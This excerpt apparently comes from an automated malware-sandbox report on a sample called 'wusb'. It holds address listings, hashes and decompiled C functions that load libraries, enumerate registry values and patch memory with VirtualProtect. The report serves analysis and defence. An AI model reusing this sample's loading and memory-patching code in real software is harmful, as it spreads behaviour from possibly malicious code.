                                                        0x00406fc2
                                                        0x00406fc2
                                                        0x00406d19
                                                        0x00000000
                                                        0x00000000
                                                        0x00406d3a
                                                        0x00406d3e
                                                        0x00406d45
                                                        0x00406d48
                                                        0x00406d4b
                                                        0x00406d40
                                                        0x00406d40
                                                        0x00406d40
                                                        0x00406d4e
                                                        0x00406d51
                                                        0x00406d54
                                                        0x00406d54
                                                        0x00406d57
                                                        0x00406d5a
                                                        0x00406d5d
                                                        0x00406d5d
                                                        0x00406d60
                                                        0x00406d67
                                                        0x00406d6c
                                                        0x00000000
                                                        0x00000000
                                                        0x00406dfa
                                                        0x00406dfa
                                                        0x00406dfe
                                                        0x0040719c
                                                        0x00000000
                                                        0x0040719c
                                                        0x00406e04
                                                        0x00406e07
                                                        0x00406e0a
                                                        0x00406e0e
                                                        0x00406e11
                                                        0x00406e17
                                                        0x00406e19
                                                        0x00406e19
                                                        0x00406e19
                                                        0x00406e1c
                                                        0x00406e1f
                                                        0x00000000
                                                        0x00000000
                                                        0x004069ef
                                                        0x004069ef
                                                        0x004069f3
                                                        0x00407160
                                                        0x00000000
                                                        0x00407160
                                                        0x004069f9
                                                        0x004069fc
                                                        0x004069ff
                                                        0x00406a03
                                                        0x00406a06
                                                        0x00406a0c
                                                        0x00406a0e
                                                        0x00406a0e
                                                        0x00406a0e
                                                        0x00406a11
                                                        0x00406a14
                                                        0x00406a14
                                                        0x00406a17
                                                        0x00406a1a
                                                        0x00000000
                                                        0x00000000
                                                        0x00406a20
                                                        0x00406a26
                                                        0x00000000
                                                        0x00000000
                                                        0x00406a2c
                                                        0x00406a2c
                                                        0x00406a30
                                                        0x00406a33
                                                        0x00406a36
                                                        0x00406a39
                                                        0x00406a3c
                                                        0x00406a3d
                                                        0x00406a40
                                                        0x00406a42
                                                        0x00406a48
                                                        0x00406a4b
                                                        0x00406a4e
                                                        0x00406a51
                                                        0x00406a54
                                                        0x00406a57
                                                        0x00406a5a
                                                        0x00406a76
                                                        0x00406a79
                                                        0x00406a7c
                                                        0x00406a7f
                                                        0x00406a86
                                                        0x00406a8a
                                                        0x00406a8c
                                                        0x00406a90
                                                        0x00406a5c
                                                        0x00406a5c
                                                        0x00406a60
                                                        0x00406a68
                                                        0x00406a6d
                                                        0x00406a6f
                                                        0x00406a71
                                                        0x00406a71
                                                        0x00406a93
                                                        0x00406a9a
                                                        0x00406a9d
                                                        0x00000000
                                                        0x00406aa3
                                                        0x00000000
                                                        0x00406aa3
                                                        0x00000000
                                                        0x00406aa8
                                                        0x00406aa8
                                                        0x00406aac
                                                        0x0040716c
                                                        0x00000000
                                                        0x0040716c
                                                        0x00406ab2
                                                        0x00406ab5
                                                        0x00406ab8
                                                        0x00406abc
                                                        0x00406abf
                                                        0x00406ac5
                                                        0x00406ac7
                                                        0x00406ac7
                                                        0x00406ac7
                                                        0x00406aca
                                                        0x00406acd
                                                        0x00406acd
                                                        0x00406acd
                                                        0x00406ad3
                                                        0x00000000
                                                        0x00000000
                                                        0x00406ad5
                                                        0x00406ad8
                                                        0x00406adb
                                                        0x00406ade
                                                        0x00406ae1
                                                        0x00406ae4
                                                        0x00406ae7
                                                        0x00406aea
                                                        0x00406aed
                                                        0x00406af0
                                                        0x00406af3
                                                        0x00406b0b
                                                        0x00406b0e
                                                        0x00406b11
                                                        0x00406b14
                                                        0x00406b14
                                                        0x00406b17
                                                        0x00406b1b
                                                        0x00406b1d
                                                        0x00406af5
                                                        0x00406af5
                                                        0x00406afd
                                                        0x00406b02
                                                        0x00406b04
                                                        0x00406b06
                                                        0x00406b06
                                                        0x00406b20
                                                        0x00406b27
                                                        0x00406b2a
                                                        0x00000000
                                                        0x00406b2c
                                                        0x00000000
                                                        0x00406b2c
                                                        0x00406b2a
                                                        0x00406b31
                                                        0x00406b31
                                                        0x00406b31
                                                        0x00406b31
                                                        0x00000000
                                                        0x00000000
                                                        0x00406b6c
                                                        0x00406b6c
                                                        0x00406b70
                                                        0x00407178
                                                        0x00000000
                                                        0x00407178
                                                        0x00406b76
                                                        0x00406b79
                                                        0x00406b7c
                                                        0x00406b80
                                                        0x00406b83
                                                        0x00406b89
                                                        0x00406b8b
                                                        0x00406b8b
                                                        0x00406b8b
                                                        0x00406b8e
                                                        0x00406b91
                                                        0x00406b91
                                                        0x00406b97
                                                        0x00406b35
                                                        0x00406b35
                                                        0x00406b38
                                                        0x00000000
                                                        0x00406b38
                                                        0x00406b99
                                                        0x00406b99
                                                        0x00406b9c
                                                        0x00406b9f
                                                        0x00406ba2
                                                        0x00406ba5
                                                        0x00406ba8
                                                        0x00406bab
                                                        0x00406bae
                                                        0x00406bb1
                                                        0x00406bb4
                                                        0x00406bb7
                                                        0x00406bcf
                                                        0x00406bd2
                                                        0x00406bd5
                                                        0x00406bd8
                                                        0x00406bd8
                                                        0x00406bdb
                                                        0x00406bdf
                                                        0x00406be1
                                                        0x00406bb9
                                                        0x00406bb9
                                                        0x00406bc1
                                                        0x00406bc6
                                                        0x00406bc8
                                                        0x00406bca
                                                        0x00406bca
                                                        0x00406be4
                                                        0x00406beb
                                                        0x00406bee
                                                        0x00000000
                                                        0x00406bf0
                                                        0x00000000
                                                        0x00406bf0
                                                        0x00000000
                                                        0x00406e7d
                                                        0x00406e7d
                                                        0x00406e81
                                                        0x004071a8
                                                        0x00000000
                                                        0x004071a8
                                                        0x00406e87
                                                        0x00406e8a
                                                        0x00406e8d
                                                        0x00406e91
                                                        0x00406e94
                                                        0x00406e9a
                                                        0x00406e9c
                                                        0x00406e9c
                                                        0x00406e9c
                                                        0x00406e9f
                                                        0x00000000
                                                        0x00000000
                                                        0x00406c4d
                                                        0x00406c4d
                                                        0x00406c50
                                                        0x00406fc2
                                                        0x00406fc2
                                                        0x00000000
                                                        0x00406fc2
                                                        0x00000000
                                                        0x00406f8c
                                                        0x00406f90
                                                        0x00406fb2
                                                        0x00406fb5
                                                        0x00406fbf
                                                        0x00406fc2
                                                        0x00406fc2
                                                        0x00000000
                                                        0x00406fc2
                                                        0x00406fc2
                                                        0x00406f92
                                                        0x00406f95
                                                        0x00406f99
                                                        0x00406f9c
                                                        0x00406f9c
                                                        0x00406f9f
                                                        0x00000000
                                                        0x00000000
                                                        0x00407049
                                                        0x0040704d
                                                        0x0040706b
                                                        0x0040706b
                                                        0x0040706b
                                                        0x00407072
                                                        0x00407079
                                                        0x00407080
                                                        0x00407080
                                                        0x00000000
                                                        0x00407080
                                                        0x0040704f
                                                        0x00407052
                                                        0x00407055
                                                        0x00407058
                                                        0x0040705f
                                                        0x00406fa3
                                                        0x00406fa3
                                                        0x00406fa6
                                                        0x00000000
                                                        0x00000000
                                                        0x0040713a
                                                        0x0040713d
                                                        0x0040703e
                                                        0x00000000
                                                        0x00000000
                                                        0x00406d74
                                                        0x00406d76
                                                        0x00406d7d
                                                        0x00406d7e
                                                        0x00406d80
                                                        0x00406d83
                                                        0x00000000
                                                        0x00000000
                                                        0x00406d8b
                                                        0x00406d8e
                                                        0x00406d91
                                                        0x00406d93
                                                        0x00406d95
                                                        0x00406d95
                                                        0x00406d96
                                                        0x00406d99
                                                        0x00406da0
                                                        0x00406da3
                                                        0x00406db1
                                                        0x00000000
                                                        0x00000000
                                                        0x00407087
                                                        0x00407087
                                                        0x0040708a
                                                        0x00407091
                                                        0x00000000
                                                        0x00000000
                                                        0x00407096
                                                        0x00407096
                                                        0x0040709a
                                                        0x004071d2
                                                        0x00000000
                                                        0x004071d2
                                                        0x004070a0
                                                        0x004070a3
                                                        0x004070a6
                                                        0x004070aa
                                                        0x004070ad
                                                        0x004070b3
                                                        0x004070b5
                                                        0x004070b5
                                                        0x004070b5
                                                        0x004070b8
                                                        0x004070bb
                                                        0x004070bb
                                                        0x004070bb
                                                        0x004070bb
                                                        0x004070be
                                                        0x004070be
                                                        0x004070c2
                                                        0x00407122
                                                        0x00407125
                                                        0x0040712a
                                                        0x0040712b
                                                        0x0040712d
                                                        0x0040712f
                                                        0x00407132
                                                        0x0040703e
                                                        0x0040703e
                                                        0x00000000
                                                        0x00407044
                                                        0x0040703e
                                                        0x004070c4
                                                        0x004070ca
                                                        0x004070cd
                                                        0x004070d0
                                                        0x004070d3
                                                        0x004070d6
                                                        0x004070d9
                                                        0x004070dc
                                                        0x004070df
                                                        0x004070e2
                                                        0x004070e5
                                                        0x004070fe
                                                        0x00407101
                                                        0x00407104
                                                        0x00407107
                                                        0x0040710b
                                                        0x0040710d
                                                        0x0040710d
                                                        0x0040710e
                                                        0x00407111
                                                        0x004070e7
                                                        0x004070e7
                                                        0x004070ef
                                                        0x004070f4
                                                        0x004070f6
                                                        0x004070f9
                                                        0x004070f9
                                                        0x00407114
                                                        0x0040711b
                                                        0x00000000
                                                        0x0040711d
                                                        0x00000000
                                                        0x0040711d
                                                        0x00000000
                                                        0x00406db9
                                                        0x00406dbc
                                                        0x00406df2
                                                        0x00406f22
                                                        0x00406f22
                                                        0x00406f22
                                                        0x00406f22
                                                        0x00406f25
                                                        0x00406f25
                                                        0x00406f28
                                                        0x00406f2a
                                                        0x004071b4
                                                        0x00000000
                                                        0x004071b4
                                                        0x00406f30
                                                        0x00406f33
                                                        0x00000000
                                                        0x00000000
                                                        0x00406f39
                                                        0x00406f3d
                                                        0x00406f40
                                                        0x00406f40
                                                        0x00406f40
                                                        0x00000000
                                                        0x00406f40
                                                        0x00406dbe
                                                        0x00406dc0
                                                        0x00406dc2
                                                        0x00406dc4
                                                        0x00406dc7
                                                        0x00406dc8
                                                        0x00406dca
                                                        0x00406dcc
                                                        0x00406dcf
                                                        0x00406dd2
                                                        0x00406de8
                                                        0x00406ded
                                                        0x00406e25
                                                        0x00406e25
                                                        0x00406e29
                                                        0x00406e55
                                                        0x00406e57
                                                        0x00406e5e
                                                        0x00406e61
                                                        0x00406e64
                                                        0x00406e64
                                                        0x00406e69
                                                        0x00406e69
                                                        0x00406e6b
                                                        0x00406e6e
                                                        0x00406e75
                                                        0x00406e78
                                                        0x00406ea5
                                                        0x00406ea5
                                                        0x00406ea8
                                                        0x00406eab
                                                        0x00406f1f
                                                        0x00406f1f
                                                        0x00406f1f
                                                        0x00000000
                                                        0x00406f1f
                                                        0x00406ead
                                                        0x00406eb3
                                                        0x00406eb6
                                                        0x00406eb9
                                                        0x00406ebc
                                                        0x00406ebf
                                                        0x00406ec2
                                                        0x00406ec5
                                                        0x00406ec8
                                                        0x00406ecb
                                                        0x00406ece
                                                        0x00406ee7
                                                        0x00406ee9
                                                        0x00406eec
                                                        0x00406eed
                                                        0x00406ef0
                                                        0x00406ef2
                                                        0x00406ef5
                                                        0x00406ef7
                                                        0x00406ef9
                                                        0x00406efc
                                                        0x00406efe
                                                        0x00406f01
                                                        0x00406f05
                                                        0x00406f07
                                                        0x00406f07
                                                        0x00406f08
                                                        0x00406f0b
                                                        0x00406f0e
                                                        0x00406ed0
                                                        0x00406ed0
                                                        0x00406ed8
                                                        0x00406edd
                                                        0x00406edf
                                                        0x00406ee2
                                                        0x00406ee2
                                                        0x00406f11
                                                        0x00406f18
                                                        0x00406ea2
                                                        0x00406ea2
                                                        0x00406ea2
                                                        0x00406ea2
                                                        0x00000000
                                                        0x00406f1a
                                                        0x00000000
                                                        0x00406f1a
                                                        0x00406f18
                                                        0x00406e2b
                                                        0x00406e2e
                                                        0x00406e30
                                                        0x00406e33
                                                        0x00406e36
                                                        0x00406e39
                                                        0x00406e3b
                                                        0x00406e3e
                                                        0x00406e41
                                                        0x00406e41
                                                        0x00406e44
                                                        0x00406e44
                                                        0x00406e47
                                                        0x00406e4e
                                                        0x00406e22
                                                        0x00406e22
                                                        0x00406e22
                                                        0x00406e22
                                                        0x00000000
                                                        0x00406e50
                                                        0x00000000
                                                        0x00406e50
                                                        0x00406e4e
                                                        0x00406dd4
                                                        0x00406dd7
                                                        0x00406dd9
                                                        0x00406ddc
                                                        0x00000000
                                                        0x00000000
                                                        0x00406b3b
                                                        0x00406b3b
                                                        0x00406b3f
                                                        0x00407184
                                                        0x00000000
                                                        0x00407184
                                                        0x00406b45
                                                        0x00406b48
                                                        0x00406b4b
                                                        0x00406b4e
                                                        0x00406b51
                                                        0x00406b54
                                                        0x00406b57
                                                        0x00406b59
                                                        0x00406b5c
                                                        0x00406b5f
                                                        0x00406b62
                                                        0x00406b64
                                                        0x00406b64
                                                        0x00406b64
                                                        0x00000000
                                                        0x00000000
                                                        0x00406cc6
                                                        0x00406cc6
                                                        0x00406cca
                                                        0x00407190
                                                        0x00000000
                                                        0x00407190
                                                        0x00406cd0
                                                        0x00406cd3
                                                        0x00406cd6
                                                        0x00406cd9
                                                        0x00406cdb
                                                        0x00406cdb
                                                        0x00406cdb
                                                        0x00406cde
                                                        0x00406ce1
                                                        0x00406ce4
                                                        0x00406ce7
                                                        0x00406cea
                                                        0x00406ced
                                                        0x00406cee
                                                        0x00406cf0
                                                        0x00406cf0
                                                        0x00406cf0
                                                        0x00406cf3
                                                        0x00406cf6
                                                        0x00406cf9
                                                        0x00406cfc
                                                        0x00406cfc
                                                        0x00406cfc
                                                        0x00406cff
                                                        0x00406d01
                                                        0x00406d01
                                                        0x00000000
                                                        0x00000000
                                                        0x00406f43
                                                        0x00406f43
                                                        0x00406f43
                                                        0x00406f47
                                                        0x00000000
                                                        0x00000000
                                                        0x00406f4d
                                                        0x00406f50
                                                        0x00406f53
                                                        0x00406f56
                                                        0x00406f58
                                                        0x00406f58
                                                        0x00406f58
                                                        0x00406f5b
                                                        0x00406f5e
                                                        0x00406f61
                                                        0x00406f64
                                                        0x00406f67
                                                        0x00406f6a
                                                        0x00406f6b
                                                        0x00406f6d
                                                        0x00406f6d
                                                        0x00406f6d
                                                        0x00406f70
                                                        0x00406f73
                                                        0x00406f76
                                                        0x00406f79
                                                        0x00406f7c
                                                        0x00406f80
                                                        0x00406f82
                                                        0x00406f85
                                                        0x00000000
                                                        0x00406f87
                                                        0x00406d04
                                                        0x00406d04
                                                        0x00000000
                                                        0x00406d04
                                                        0x00406f85
                                                        0x004071ba
                                                        0x00000000
                                                        0x00000000
                                                        0x004067e9
                                                        0x004071f1
                                                        0x004071f1
                                                        0x00000000
                                                        0x004071f1
                                                        0x0040703e
                                                        0x00406fc5
                                                        0x00406fc2

                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.675584528.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.675577432.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675601412.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_wusb.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 64597932ebf2bb6f2d249f60c1a052c2706a55a0ac38294ae6599684583fce52
                                                        • Instruction ID: 7d50f74d422c9426a2654202d950de31cd619cd826110beab4429d7d99e33e8a
                                                        • Opcode Fuzzy Hash: 64597932ebf2bb6f2d249f60c1a052c2706a55a0ac38294ae6599684583fce52
                                                        • Instruction Fuzzy Hash: F9715671E04229DBDF28CF98C9447ADBBB1FF44305F11806AD856BB281C7389986DF44
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0040202C Relevance: 4.6, APIs: 3, Instructions: 73libraryCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 60%
                                                        			E0040202C(void* __ebx, void* __eflags) {
				struct HINSTANCE__* _t23;
				struct HINSTANCE__* _t31;
				void* _t32;
				void* _t34;
				WCHAR* _t37;
				intOrPtr* _t38;
				void* _t39;

				_t32 = __ebx;
				asm("sbb eax, 0x42a2d8");
				 *(_t39 - 4) = 1;
				if(__eflags < 0) {
					_push(0xffffffe7);
					L15:
					E00401423();
					L16:
					 *0x42a2a8 =  *0x42a2a8 +  *(_t39 - 4);
					return 0;
				}
				_t37 = E00402C37(0xfffffff0);
				 *((intOrPtr*)(_t39 - 0x3c)) = E00402C37(1);
				if( *((intOrPtr*)(_t39 - 0x18)) == __ebx) {
					L3:
					_t23 = LoadLibraryExW(_t37, _t32, 8); // executed
					 *(_t39 + 8) = _t23;
					if(_t23 == _t32) {
						_push(0xfffffff6);
						goto L15;
					}
					L4:
					_t38 = E00406695( *(_t39 + 8),  *((intOrPtr*)(_t39 - 0x3c)));
					if(_t38 == _t32) {
						E004052B0(0xfffffff7,  *((intOrPtr*)(_t39 - 0x3c)));
					} else {
						 *(_t39 - 4) = _t32;
						if( *((intOrPtr*)(_t39 - 0x20)) == _t32) {
							 *_t38( *((intOrPtr*)(_t39 - 8)), 0x400, _t34, 0x40cdac, 0x40a000); // executed
						} else {
							E00401423( *((intOrPtr*)(_t39 - 0x20)));
							if( *_t38() != 0) {
								 *(_t39 - 4) = 1;
							}
						}
					}
					if( *((intOrPtr*)(_t39 - 0x1c)) == _t32 && E004038FA( *(_t39 + 8)) != 0) {
						FreeLibrary( *(_t39 + 8));
					}
					goto L16;
				}
				_t31 = GetModuleHandleW(_t37); // executed
				 *(_t39 + 8) = _t31;
				if(_t31 != __ebx) {
					goto L4;
				}
				goto L3;
			}










                                                        0x0040202c
                                                        0x0040202c
                                                        0x00402031
                                                        0x00402038
                                                        0x004020f7
                                                        0x00402245
                                                        0x00402245
                                                        0x00402abf
                                                        0x00402ac2
                                                        0x00402ace
                                                        0x00402ace
                                                        0x00402047
                                                        0x00402051
                                                        0x00402054
                                                        0x00402064
                                                        0x00402068
                                                        0x00402070
                                                        0x00402073
                                                        0x004020f0
                                                        0x00000000
                                                        0x004020f0
                                                        0x00402075
                                                        0x00402080
                                                        0x00402084
                                                        0x004020c4
                                                        0x00402086
                                                        0x00402089
                                                        0x0040208c
                                                        0x004020b8
                                                        0x0040208e
                                                        0x00402091
                                                        0x0040209a
                                                        0x0040209c
                                                        0x0040209c
                                                        0x0040209a
                                                        0x0040208c
                                                        0x004020cc
                                                        0x004020e5
                                                        0x004020e5
                                                        0x00000000
                                                        0x004020cc
                                                        0x00402057
                                                        0x0040205f
                                                        0x00402062
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000

                                                        APIs
                                                        • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00402057
                                                          • Part of subcall function 004052B0: lstrlenW.KERNEL32(Create folder: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\Grade,00000000,00410EA0,00403094,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 004052E8
                                                          • Part of subcall function 004052B0: lstrlenW.KERNEL32(00403233,Create folder: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\Grade,00000000,00410EA0,00403094,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 004052F8
                                                          • Part of subcall function 004052B0: lstrcatW.KERNEL32(Create folder: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\Grade,00403233), ref: 0040530B
                                                          • Part of subcall function 004052B0: SetWindowTextW.USER32(Create folder: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\Grade,Create folder: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\Grade), ref: 0040531D
                                                          • Part of subcall function 004052B0: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405343
                                                          • Part of subcall function 004052B0: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040535D
                                                          • Part of subcall function 004052B0: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040536B
                                                        • LoadLibraryExW.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00402068
                                                        • FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 004020E5
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.675584528.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.675577432.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675601412.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_wusb.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                        • String ID:
                                                        • API String ID: 334405425-0
                                                        • Opcode ID: e3961a0bc32dc20507236d74e46fa7042790e53cd6742115274889cdc0d07f9d
                                                        • Instruction ID: 1b7e6cc8a89e608973352e39bc6088f07de5daa2050f71ccd5864d961518f39c
                                                        • Opcode Fuzzy Hash: e3961a0bc32dc20507236d74e46fa7042790e53cd6742115274889cdc0d07f9d
                                                        • Instruction Fuzzy Hash: 0321B331900218EBCF216FA5CE4DAAE7A70AF04354F60413BF511B51E1DBBD4951DA6E
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 004024F2 Relevance: 4.5, APIs: 3, Instructions: 47registryCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 86%
                                                        			E004024F2(int* __ebx, intOrPtr __edx, short* __esi) {
				void* _t9;
				int _t10;
				long _t13;
				int* _t16;
				intOrPtr _t21;
				void* _t22;
				short* _t24;
				void* _t26;
				void* _t29;

				_t24 = __esi;
				_t21 = __edx;
				_t16 = __ebx;
				_t9 = E00402C77(_t29, 0x20019); // executed
				_t22 = _t9;
				_t10 = E00402C15(3);
				 *((intOrPtr*)(_t26 - 0x4c)) = _t21;
				 *__esi = __ebx;
				if(_t22 == __ebx) {
					 *((intOrPtr*)(_t26 - 4)) = 1;
				} else {
					 *(_t26 + 8) = 0x3ff;
					if( *((intOrPtr*)(_t26 - 0x18)) == __ebx) {
						_t13 = RegEnumValueW(_t22, _t10, __esi, _t26 + 8, __ebx, __ebx, __ebx, __ebx);
						__eflags = _t13;
						if(_t13 != 0) {
							 *((intOrPtr*)(_t26 - 4)) = 1;
						}
					} else {
						RegEnumKeyW(_t22, _t10, __esi, 0x3ff);
					}
					_t24[0x3ff] = _t16;
					_push(_t22);
					RegCloseKey();
				}
				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t26 - 4));
				return 0;
			}












                                                        0x004024f2
                                                        0x004024f2
                                                        0x004024f2
                                                        0x004024f7
                                                        0x004024fe
                                                        0x00402500
                                                        0x00402508
                                                        0x0040250b
                                                        0x0040250e
                                                        0x00402885
                                                        0x00402514
                                                        0x0040251c
                                                        0x0040251f
                                                        0x00402538
                                                        0x0040253e
                                                        0x00402540
                                                        0x00402542
                                                        0x00402542
                                                        0x00402521
                                                        0x00402525
                                                        0x00402525
                                                        0x00402549
                                                        0x00402550
                                                        0x00402551
                                                        0x00402551
                                                        0x00402ac2
                                                        0x00402ace

                                                        APIs
                                                        • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 00402525
                                                        • RegEnumValueW.ADVAPI32 ref: 00402538
                                                        • RegCloseKey.ADVAPI32(?,?,?,Finishs,00000000,00000011,00000002), ref: 00402551
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.675584528.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.675577432.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675601412.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_wusb.jbxd
                                                        Similarity
                                                        • API ID: Enum$CloseValue
                                                        • String ID:
                                                        • API String ID: 397863658-0
                                                        • Opcode ID: ceb7b32d921ca444f1fc010657555d0ace05083c01aecd1a6f00f0e4ceb8bccc
                                                        • Instruction ID: caf525ecc09255a736170ff5365d3a7771f075d5505ff7476addd39d58865d97
                                                        • Opcode Fuzzy Hash: ceb7b32d921ca444f1fc010657555d0ace05083c01aecd1a6f00f0e4ceb8bccc
                                                        • Instruction Fuzzy Hash: 4A017171904104EFE7159FA5DE89ABFB6BCEF44348F10403EF105A62D0DAB84E459B69
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 100027C2 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 21memoryCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			_entry_(intOrPtr _a4, intOrPtr _a8) {

				 *0x10004048 = _a4;
				if(_a8 == 1) {
					VirtualProtect(0x1000405c, 4, 0x40, 0x1000404c); // executed
					 *0x1000405c = 0xc2;
					 *0x1000404c = 0;
					 *0x10004054 = 0;
					 *0x10004068 = 0;
					 *0x10004058 = 0;
					 *0x10004050 = 0;
					 *0x10004060 = 0;
					 *0x1000405e = 0;
				}
				return 1;
			}



                                                        0x100027cb
                                                        0x100027d0
                                                        0x100027e0
                                                        0x100027e8
                                                        0x100027ef
                                                        0x100027f4
                                                        0x100027f9
                                                        0x100027fe
                                                        0x10002803
                                                        0x10002808
                                                        0x1000280d
                                                        0x1000280d
                                                        0x10002815

                                                        APIs
                                                        • VirtualProtect.KERNELBASE(1000405C,00000004,00000040,1000404C), ref: 100027E0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.677589038.0000000010001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000002.00000002.677505776.0000000010000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000002.00000002.677602813.0000000010003000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000002.00000002.677619149.0000000010005000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_10000000_wusb.jbxd
                                                        Similarity
                                                        • API ID: ProtectVirtual
                                                        • String ID: `ghv@Mhv
                                                        • API String ID: 544645111-2667177705
                                                        • Opcode ID: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                        • Instruction ID: 43a77b614ff4017466e57d7f63f0e44ab05d53355a3bca00642047650885b550
